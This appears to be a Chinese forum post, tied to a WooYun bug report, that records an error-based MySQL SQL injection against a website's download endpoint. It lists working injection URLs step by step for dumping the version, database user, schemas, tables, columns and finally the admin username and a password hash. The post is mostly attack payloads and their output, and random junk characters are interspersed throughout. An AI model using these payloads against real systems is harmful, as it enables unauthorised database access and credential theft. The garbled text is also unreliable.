http://www.wooyun.org/bugs/wooyun-2010-01666; S& H2 }/ R4 ^& c
* m" z7 I2 W% P* Y$ d0 J9 @" O5 J; X之前想找个测试 没想到这有 可以测试下做个记录而已
8 Q0 x: D$ Z: E1 G8 Q
1 \$ A4 T8 ?! W* @http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
1 P$ g. j, Z, l" h! @+ f8 k: f& ^% F* J7 ~/ a: {- |! Z4 \
/data0/htdocs/leqi_new/app/myapp.php {0 e2 ]& g: m7 D. O/ }# S- s
7 h! y# i5 ]4 W ?7 A- r9 Q
或者
: e. [3 c' K9 m8 _: ?$ }2 I
& O6 |6 F( O8 D9 z# j+ I/**********version()**********/ 5.1.49-log# d4 }$ y& b5 P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 r5 q+ _8 a# T7 Y% _, L) \
' C. V% u7 ?1 m8 r1 w/**********user()**********/ % Y5 {* p) [0 _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 x+ g! V4 K) d0 p' n5 q: {
5 B5 e( ]8 H! c+ [. A/**********database()**********/ leqi5 c) Y" I2 ^$ R' g8 ~% U, P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. w* F7 x# ?9 j& E
2 f# m& L( n8 Y6 ~! n
/**********limit依次递归爆库**********/' R$ b, N7 j5 X& r+ I
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& Z5 N. w* S( A7 G/ U7 H2 h- s# z1 binformation_schema' p2 C5 C- {2 S1 L: {$ @
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ K; e d- a* w
leqi3 Y# a, k6 k" e8 N' F1 w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
B3 u: e- l6 |) y6 q% h% E6 Vtest0 |6 m) U E) P) Q& i0 {- y
/ g# L* d; l- o& J0 V& a2 C4 j4 `% ]
/**********limit依次递归爆表名**********/
+ t2 F! ^0 H% g( f% Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 }: ]7 y8 d& s3 T
users; N5 J& A+ D* v& K3 G8 E2 \: [
& \8 a( }' }* Y, u
/**********limit依次递归爆字段名**********/
8 a7 a9 g+ s( Z7 _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, U! D4 p! p" |6 u! r1 E7 K" [1 ]: \/ suser_id,username,nickname,passwd,group_id
/ X" S0 ]* j- [0 R1 l2 F mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 ?2 ~0 Z6 A+ q9 y7 n
/wapc/5000_0005_003
- e/ F8 b# k3 N4 X3 L+ L, c- I& [11 21+ ^, o/ o% b! u7 F( U* {0 Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 {' }( B! }* q5 v
/wapc/5000_0005_003& H, N x$ c8 p
11 341 351 361
7 b+ C$ z1 U0 m/**********爆数据**********/+ f7 P& g* }& j& w7 \4 C' p& `
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- a* F2 ] \+ g5 K- ]$ U+ \admin
; o5 O, Z$ m* Y" `! [ `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
9 ?- @0 ]$ B2 C6a8b4574ca231eb8bd52764d4978ffcd9 y5 s: O' Q- _% f
: u: x* q) l/ E
' _) c+ @9 w7 u/ p ] j6 ?7 J |